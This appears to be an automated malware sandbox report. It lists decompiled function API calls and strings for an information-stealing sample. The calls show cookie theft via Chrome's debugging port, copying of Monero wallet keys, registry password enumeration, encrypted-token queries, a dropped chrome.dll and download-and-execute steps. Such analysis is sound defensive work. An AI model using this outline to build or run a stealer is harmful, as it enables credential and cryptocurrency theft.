                                    • ShellExecuteEx.SHELL32(0000003C), ref: 003735AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0037373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: ba0256f23c60c3cef97f7ff95a96b15462d3f2588871c84807460474f30dca32
                                    • Instruction ID: 2b20f6fde52e67d97bf97f38a805d704f18081ae5a1f98b9f2920498c46d7f80
                                    • Opcode Fuzzy Hash: ba0256f23c60c3cef97f7ff95a96b15462d3f2588871c84807460474f30dca32
                                    • Instruction Fuzzy Hash: 2E1224719105089ADB2AFB90DDA2FEDB779AF54300F10C599F10B6A191EF382B49CF61
                                    APIs
                                      • Part of subcall function 00369A50: InternetOpenA.WININET(00380AF6,00000001,00000000,00000000,00000000), ref: 00369A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00369CAF
                                    • lstrcat.KERNEL32(?,003812C4), ref: 00369CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00369CD5
                                    • lstrcat.KERNEL32(?,003812C8), ref: 00369CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00369CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00369D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00369D17
                                    • lstrlen.KERNEL32(00000000), ref: 00369D26
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: b8c0487ebc5bce18f9055da6710746e0a7e9d4ff3dfa52db0ecd798a37b60542
                                    • Instruction ID: f7adebe851d081d136154871a1b20621fccf3f3bf3a9de4548e49dbdf1674afc
                                    • Opcode Fuzzy Hash: b8c0487ebc5bce18f9055da6710746e0a7e9d4ff3dfa52db0ecd798a37b60542
                                    • Instruction Fuzzy Hash: A75176B1810608ABDB15EBE0DC55FEE733CAF44301F409558F50AAB095EF756A49CF61
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 003662D0: InternetOpenA.WININET(00380DFF,00000001,00000000,00000000,00000000), ref: 00366331
                                      • Part of subcall function 003662D0: StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366353
                                      • Part of subcall function 003662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366385
                                      • Part of subcall function 003662D0: HttpOpenRequestA.WININET(00000000,GET,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 003663D5
                                      • Part of subcall function 003662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0036640F
                                      • Part of subcall function 003662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00366421
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375568
                                    • lstrlen.KERNEL32(00000000), ref: 0037557F
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 003755B4
                                    • lstrlen.KERNEL32(00000000), ref: 003755D3
                                    • lstrlen.KERNEL32(00000000), ref: 003755FE
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 44fdac0b4d9ff82f9f40c1ddb5bcda4f8b1ca1790105d7a279eb6aa0fe4c7a9f
                                    • Instruction ID: 886f72aa444f48c0e75f697ca3e8a9553dacd9b532b2503ffd6abc5c0e2bbe72
                                    • Opcode Fuzzy Hash: 44fdac0b4d9ff82f9f40c1ddb5bcda4f8b1ca1790105d7a279eb6aa0fe4c7a9f
                                    • Instruction Fuzzy Hash: 13510A709105489BCB2AFF60CDA6AED7779AF90340F50C468E50E5F592EB386B05CB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 1f0592b763489a2016f1cdd07616195e57c427eec18bfe28bcab6ddf945f1d35
                                    • Instruction ID: 7a534d0a28ba81586354fc06816eb33ef0c68abaec5784c986f92ab47f223e50
                                    • Opcode Fuzzy Hash: 1f0592b763489a2016f1cdd07616195e57c427eec18bfe28bcab6ddf945f1d35
                                    • Instruction Fuzzy Hash: 99C1B4B69001099BCB25EF60DC99FDE73B9AF54304F008599F50EAB241DB74EA85CF91
                                    APIs
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0037453C
                                    • lstrcat.KERNEL32(?,00F3DB48), ref: 0037455B
                                    • lstrcat.KERNEL32(?,?), ref: 0037456F
                                    • lstrcat.KERNEL32(?,00F3CEC8), ref: 00374583
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00378F20: GetFileAttributesA.KERNEL32(00000000,?,00361B94,?,?,0038577C,?,?,00380E22), ref: 00378F2F
                                      • Part of subcall function 0036A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0036A489
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00379550: GlobalAlloc.KERNEL32(00000000,0037462D,0037462D), ref: 00379563
                                    • StrStrA.SHLWAPI(?,00F3DDD0), ref: 00374643
                                    • GlobalFree.KERNEL32(?), ref: 00374762
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A23F
                                      • Part of subcall function 0036A210: LocalAlloc.KERNEL32(00000040,?,?,?,00364F3E,00000000,?), ref: 0036A251
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A27A
                                      • Part of subcall function 0036A210: LocalFree.KERNEL32(?,?,?,?,00364F3E,00000000,?), ref: 0036A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 003746F3
                                    • StrCmpCA.SHLWAPI(?,003808D2), ref: 00374710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00374722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00374735
                                    • lstrcat.KERNEL32(00000000,00380FA0), ref: 00374744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: bd42b33c9d6af0aa60d10ed2fa125427e45cde107ce0f56a8b2e1bfa0afb3e00
                                    • Instruction ID: b7f12f231234c655b3df1e19a1a4bdb5e091a84ea2b03a8ad138382cfc35e5dc
                                    • Opcode Fuzzy Hash: bd42b33c9d6af0aa60d10ed2fa125427e45cde107ce0f56a8b2e1bfa0afb3e00
                                    • Instruction Fuzzy Hash: 907157B6900208ABDB25EBB0DD99FDE7379AF88300F048598F619A7141EB34DB44CF91
                                    APIs
                                      • Part of subcall function 003612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003612B4
                                      • Part of subcall function 003612A0: RtlAllocateHeap.NTDLL(00000000), ref: 003612BB
                                      • Part of subcall function 003612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003612D7
                                      • Part of subcall function 003612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003612F5
                                      • Part of subcall function 003612A0: RegCloseKey.ADVAPI32(?), ref: 003612FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036134F
                                    • lstrlen.KERNEL32(?), ref: 0036135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00361377
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00361465
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 003614EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: e643c528277bdce7e809cd09d63974ceed3e4cddb32ace922a977872de3ae8cb
                                    • Instruction ID: 041f1bdde758071703923790a8f19866c9801a63e22b559ae88b9ca1723aea1f
                                    • Opcode Fuzzy Hash: e643c528277bdce7e809cd09d63974ceed3e4cddb32ace922a977872de3ae8cb
                                    • Instruction Fuzzy Hash: 325153B1D505195BCB26FB60DDA2FED737C9B54300F4085D8B60E66092EE346B88CFA6
                                    APIs
                                    • InternetOpenA.WININET(00380AF6,00000001,00000000,00000000,00000000), ref: 00369A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00369AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00369AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: ae1cd203291b4d108ef8ca77addd2aa7eae8e4432cb337d336e403e2cd944d98
                                    • Instruction ID: 0ecd1efee432f7f34d519953b3a3db7b6cd1362a867203b9e97ee79224e8eea7
                                    • Opcode Fuzzy Hash: ae1cd203291b4d108ef8ca77addd2aa7eae8e4432cb337d336e403e2cd944d98
                                    • Instruction Fuzzy Hash: 7D414F75A50218EFDB2AEF90CC95FDD77B8BB48740F108199F509AB194DBB4AE80CB50
                                    APIs
                                      • Part of subcall function 00367330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0036739A
                                      • Part of subcall function 00367330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00367411
                                      • Part of subcall function 00367330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0036746D
                                      • Part of subcall function 00367330: GetProcessHeap.KERNEL32(00000000,?), ref: 003674B2
                                      • Part of subcall function 00367330: HeapFree.KERNEL32(00000000), ref: 003674B9
                                    • lstrcat.KERNEL32(00000000,0038192C), ref: 00367666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 003676A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 003676BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 003676EF
                                    • lstrcat.KERNEL32(00000000,00381934), ref: 00367700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00367733
                                    • lstrcat.KERNEL32(00000000,00381938), ref: 0036774D
                                    • task.LIBCPMTD ref: 0036775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: 298e1579e751252b0a57255290d7747c31edef6a39ce778949bc7115f946bc97
                                    • Instruction ID: 0ee9878b74fdc559587f0acb56ab2988ecf28b0e39f370e3bc46c7554efd4134
                                    • Opcode Fuzzy Hash: 298e1579e751252b0a57255290d7747c31edef6a39ce778949bc7115f946bc97
                                    • Instruction Fuzzy Hash: 2A3161B1904104DBDB1AEBE0DC95DFF737AEB48301B509208F506672A5DF34AA86DBD0
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                    • InternetOpenA.WININET(00380DFB,00000001,00000000,00000000,00000000), ref: 0036615F
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003661DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00366203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0036622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0036625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00366299
                                    • InternetCloseHandle.WININET(?), ref: 003662A3
                                    • InternetCloseHandle.WININET(00000000), ref: 003662B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 13f388a7d2b5fb0f2b029fe9ca1f4c051a072da06f005ce8d8e17726615bd587
                                    • Instruction ID: a403c5bc6043181ffff0d541e10afd28e3be49aaf1229d4a9aadcc2fe9edd31b
                                    • Opcode Fuzzy Hash: 13f388a7d2b5fb0f2b029fe9ca1f4c051a072da06f005ce8d8e17726615bd587
                                    • Instruction Fuzzy Hash: 695173B1A00208ABDF31DF90CC5AFEE7779AB44741F108498F609AB1C0DB756A89CF95
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 003E024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 003E035B
                                    • CatchIt.LIBVCRUNTIME ref: 003E03AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 003E04C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: 8ae3be54dbc54d6155fbb6650213a0380c0b73f90fc30f485e45d35570b41cff
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: 4EB1E031800269DFCF1ADFA6D9819AEB7B5FF04304F11466AE9116B292D3B0DE91CF91
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0036739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00367411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0036746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003674B2
                                    • HeapFree.KERNEL32(00000000), ref: 003674B9
                                    • task.LIBCPMTD ref: 003675B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 4b839645896554dba0691768dd50eee3d1ff19e41e32b66400934b40130a54a9
                                    • Instruction ID: 76af9e5b89fa68f005e0f14335cddea63f87cb572019012425170a090b009237
                                    • Opcode Fuzzy Hash: 4b839645896554dba0691768dd50eee3d1ff19e41e32b66400934b40130a54a9
                                    • Instruction Fuzzy Hash: 8D615DB180425C9BDB25DB50CC55BDAB3B8BF48304F40C5E9E649AA145EFB06BC9CFA0
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • lstrlen.KERNEL32(00000000), ref: 0036BC6F
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0036BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 0036BD75
                                    • lstrlen.KERNEL32(00000000), ref: 0036BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: c7f101e15ab36aa6ad578da2fb3ddd6c8e230d88a65344597b220e4fb1b2ff83
                                    • Instruction ID: 196331da5271d83515173f9a5517f1f34ea7a065894089bae89026d7ae1ec734
                                    • Opcode Fuzzy Hash: c7f101e15ab36aa6ad578da2fb3ddd6c8e230d88a65344597b220e4fb1b2ff83
                                    • Instruction Fuzzy Hash: 02B14A71910508ABCF26FBA0CD66DEE737DAF54300F508558F50BAB191EF386A48CB62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: d2a7529f4ab52c025a624537d980e4ec44d4675c1f1b0735a6149c43b069463b
                                    • Instruction ID: fa8b5701442e3c7c74955f00ccbd74fa8af7b57b13cca760f7f00c9edc4e1da1
                                    • Opcode Fuzzy Hash: d2a7529f4ab52c025a624537d980e4ec44d4675c1f1b0735a6149c43b069463b
                                    • Instruction Fuzzy Hash: E7F082B290C209EFD3A49FE0EC1975CBBB1EB04707F154299F609961D0C6B05AA0EB91
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00379850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,003708DC,C:\ProgramData\chrome.dll), ref: 00379871
                                      • Part of subcall function 0036A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0036A098
                                    • StrCmpCA.SHLWAPI(00000000,00F388D0), ref: 00370922
                                    • StrCmpCA.SHLWAPI(00000000,00F38860), ref: 00370B79
                                    • StrCmpCA.SHLWAPI(00000000,00F38870), ref: 00370A0C
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00370C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 003708CD
                                    • C:\ProgramData\chrome.dll, xrefs: 00370C30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 460ee369f7f9eda717a63267c576157d724f788b935bded2974f2555b59849a1
                                    • Instruction ID: 3e4cba1dc5ccb0115c902cf3935be93d6657c36e1968fdaf3e37d527458119eb
                                    • Opcode Fuzzy Hash: 460ee369f7f9eda717a63267c576157d724f788b935bded2974f2555b59849a1
                                    • Instruction Fuzzy Hash: 9BA175717002089FCB29EF64D996EED77BAAFD5300F10C16DE40E9F251DA349A09CB92
                                    APIs
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                    • wsprintfA.USER32 ref: 00369E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00369F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00369F17
                                    • lstrcat.KERNEL32(00000000,003812D8), ref: 00369F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00369F7C
                                    • Sleep.KERNEL32(00001388), ref: 0036A013
                                      • Part of subcall function 003799A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003799C5
                                      • Part of subcall function 003799A0: Process32First.KERNEL32(0036A056,00000128), ref: 003799D9
                                      • Part of subcall function 003799A0: Process32Next.KERNEL32(0036A056,00000128), ref: 003799F2
                                      • Part of subcall function 003799A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00379A4E
                                      • Part of subcall function 003799A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00379A6C
                                      • Part of subcall function 003799A0: CloseHandle.KERNEL32(00000000), ref: 00379A79
                                      • Part of subcall function 003799A0: CloseHandle.KERNEL32(0036A056), ref: 00379A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
